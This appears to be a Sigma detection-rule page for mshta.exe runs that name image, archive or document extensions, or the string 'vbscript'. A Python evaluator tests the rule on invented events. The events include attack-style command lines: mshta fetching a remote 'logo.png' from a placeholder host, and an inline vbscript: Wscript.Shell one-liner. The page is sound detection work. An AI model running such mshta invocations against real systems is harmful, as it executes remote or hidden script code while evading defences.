MSHTA Execution with Suspicious File Extensions

Detects execution of mshta.exe with a command line that references file types which do not normally carry HTA (HTML Application) content, such as .png, .jpg, .zip and .pdf. Such files are frequently polyglots: mshta.exe does not validate the file extension and executes any HTA content it finds, so a payload can be served under an image or archive name and still run. MSHTA is a legitimate Windows utility for running HTML Applications containing VBScript or JScript, and threat actors abuse this LOLBin to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. The keyword list also includes the literal string 'vbscript', which catches inline execution through the vbscript: protocol handler with no file on disk at all. Two things to keep in mind when tuning: the process check accepts either an image path ending in \mshta.exe or an OriginalFileName of mshta.exe, so renamed copies of the binary are still caught where OriginalFileName is logged; and the extension check is a case-insensitive substring test over the whole command line, so an extension that appears inside a directory name or URL path will also fire.

Sigma rule (View on GitHub)

title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
    Detects execution of mshta.exe with file types that look like they do not typically represent HTA (HTML Application) content,
    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
    - http://blog.sevagas.com/?Hacking-around-HTA-files
    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
    - https://twitter.com/mattifestation/status/1326228491302563846
    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
    - attack.defense-evasion
    - attack.t1140
    - attack.t1218.005
    - attack.execution
    - attack.t1059.007
    - cve.2020-1599
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mshta.exe'
        - OriginalFileName: 'mshta.exe'
    selection_cli:
        CommandLine|contains:
            - '.7z'
            - '.avi'
            - '.bat'
            - '.bmp'
            - '.conf'
            - '.csv'
            - '.dll'
            - '.doc'
            - '.gif'
            - '.gz'
            - '.ini'
            - '.jpe'
            - '.jpg'
            - '.json'
            - '.lnk'
            - '.log'
            - '.mkv'
            - '.mp3'
            - '.mp4'
            - '.pdf'
            - '.png'
            - '.ppt'
            - '.rar'
            - '.rtf'
            - '.svg'
            - '.tar'
            - '.tmp'
            - '.txt'
            - '.xls'
            - '.xml'
            - '.yaml'
            - '.yml'
            - '.zip'
            - 'vbscript'
            # - '.chm'  # could be prone to false positives
            # - '.exe'
    condition: all of selection_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high
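To make the rule's matching semantics concrete, the following is an added example (not part of the Sigma rule, SigmaHQ or any Sigma backend) that re-implements just the Sigma features this rule uses, namely the case-insensitive 'endswith' and 'contains' modifiers, plain equality, OR between the maps of a list-valued selection, and the 'all of selection_*' condition, and runs them over a handful of constructed process_creation events. The event dictionaries, paths and command lines are invented for the demonstration; the renamed-binary case shows why OriginalFileName matters, and the last event shows the substring false positive mentioned above.

```python
"""Minimal evaluator for the 'MSHTA Execution with Suspicious File Extensions'
Sigma rule, run over constructed process_creation events.

Added example: not the Sigma rule itself and not SigmaHQ/pySigma code. It
implements only the subset of Sigma semantics this rule needs.
"""
from typing import Any

# Transcribed from the rule's selection_cli list (every active entry).
SUSPICIOUS_TOKENS = [
    '.7z', '.avi', '.bat', '.bmp', '.conf', '.csv', '.dll', '.doc', '.gif', '.gz',
    '.ini', '.jpe', '.jpg', '.json', '.lnk', '.log', '.mkv', '.mp3', '.mp4', '.pdf',
    '.png', '.ppt', '.rar', '.rtf', '.svg', '.tar', '.tmp', '.txt', '.xls', '.xml',
    '.yaml', '.yml', '.zip', 'vbscript',
]

DETECTION = {
    # A list of maps inside a selection is OR between the maps.
    "selection_img": [
        {"Image|endswith": r"\mshta.exe"},
        {"OriginalFileName": "mshta.exe"},
    ],
    # A map is AND across its fields; a list of values for one field is OR.
    "selection_cli": {"CommandLine|contains": SUSPICIOUS_TOKENS},
}


def field_matches(field_spec: str, wanted: Any, event: dict) -> bool:
    """Evaluate one 'Field|modifier: value(s)' entry against an event.
    Sigma string comparison is case-insensitive by default, so both sides
    are lower-cased before comparing."""
    field, _, modifier = field_spec.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual).lower()
    values = wanted if isinstance(wanted, list) else [wanted]
    for v in values:
        v = str(v).lower()
        if modifier == "endswith" and actual.endswith(v):
            return True
        if modifier == "contains" and v in actual:
            return True
        if modifier == "" and actual == v:
            return True
    return False


def selection_matches(selection: Any, event: dict) -> bool:
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(selection, list):
        return any(selection_matches(item, event) for item in selection)
    return all(field_matches(spec, val, event) for spec, val in selection.items())


def rule_matches(event: dict) -> bool:
    """condition: all of selection_*"""
    return all(selection_matches(sel, event)
               for name, sel in DETECTION.items() if name.startswith("selection_"))


def matched_tokens(event: dict) -> list:
    """Which command-line keywords fired; handy when triaging a hit."""
    cli = str(event.get("CommandLine", "")).lower()
    return [t for t in SUSPICIOUS_TOKENS if t in cli]


# Constructed sample events (invented, not real telemetry).
SAMPLE_EVENTS = [
    # 1: remote polyglot served with an image extension -> hit
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/logo.png"},
    # 2: inline script via the vbscript: handler, no file on disk -> hit
    {"Image": r"C:\Windows\SysWOW64\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc"":close")'},
    # 3: renamed binary; only OriginalFileName reveals mshta, and .PDF is upper-case -> hit
    {"Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r"svc.exe C:\Users\Public\report.PDF"},
    # 4: ordinary HTA launch -> no hit
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    # 5: other process with a listed extension -> no hit (selection_img fails)
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\temp\notes.txt"},
    # 6: '.log' inside a directory name -> hit, the substring false positive
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r"mshta.exe C:\Ops\weekly.logs\dashboard.hta"},
]


def evaluate_all(events: list = SAMPLE_EVENTS) -> list:
    """Return one boolean per event, in order."""
    return [rule_matches(e) for e in events]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS, 1):
        print(i, rule_matches(ev), matched_tokens(ev), ev["CommandLine"])
```

Events 1, 2, 3 and 6 fire and events 4 and 5 do not. Event 6 is the kind of hit the falsepositives entry is pointing at: when an environment legitimately launches HTAs from paths whose directory names contain a listed token, the fix is a filter on the known path rather than removing the token from the list.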
